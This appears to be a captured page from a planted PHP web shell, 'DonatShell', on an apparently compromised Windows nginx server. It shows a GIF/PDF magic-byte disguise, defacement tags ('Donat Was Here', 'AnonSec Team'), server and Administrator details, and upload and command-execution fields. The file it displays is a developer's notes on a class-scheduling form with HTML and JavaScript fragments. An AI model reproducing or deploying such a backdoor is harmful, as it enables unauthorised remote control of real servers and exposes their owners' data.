GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST2146/Resources/workingnotes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST2146/Resources/workingnotes/working notes W.txt
ScheduleClass Credential not found
When a new class is added, it is not found in a credential. This is because the credential was not linked to the new course. A new course is created when you ???. The courses are linked to credentials when you update the credential. Need to find out how new courses are added and how the YRTR is used for courses and credentials.

Really working on adding a new class and enable/disable Add button.

Add / Remove meetings does not have the correct add numbers. (ClassMeetingIndex starts at 1. Needs to -- when you remove meeting)
remove meeting also needs to Validate_ScheduleClass().

<input type="checkbox" name="scheduleclassmeetingArranged_add0" id="id_scheduleclassmeetingArranged_add0" value="1" onclick="ClassmeetingArranged(this);">

<input type="button" value="+" id="btnShowRoom_add0_0" class="small hidden" onclick="ShowNextCampus(add0,1); ClassMeeting_SetHeight('ScheduleClassForm_Meeting_Room:178');" onmouseover="ttShow('Add another room');" onmouseout="ttHide();" style="display: inline;">

768

<label class="hidden" id="labRoom_add0_0" for="selRoom_add0_0" style="display: inline-block;">Room:
		<select name="roomId_add0_0" id="selRoom_add0_0" onchange="Validate_ScheduleClass(); ShowRoomButton('add0',0); ClassMeeting_SetHeight('ScheduleClassForm_Meeting_Room:151');">
			
		</select>
	</label>


'btnRemoveRoom'.$_scmId.'_'.$campusIndex

	if ( !isNaN(buildingId) ) {
		if ( DEBUG_SetupRoomSelectOptions ) { console.log('Show '+eRoomLabelId); }
		eRoomLabel.classList.remove("hidden");
	} else {
		if ( DEBUG_SetupRoomSelectOptions ) { console.log('Hide '+eRoomLabelId); }
		eRoomLabel.classList.add("hidden");
	}

RoomLookup['EASTHU507']  = { roomId:267, buildingId:3,  campusId:'2' };

<label class="hidden" id="labBuilding_add0_0" for="selBuilding_add0_0" style="display: inline-block;">Building:
		<select id="selBuilding_add0_0" onchange="SetupRoomSelectOptions(this);">
			
		<option value=""></option><option value="3">EASTHU</option><option value="19">HUTCHI</option><option value="4">MAINHU</option></select>
	</label>

Anon7 - 2022
AnonSec Team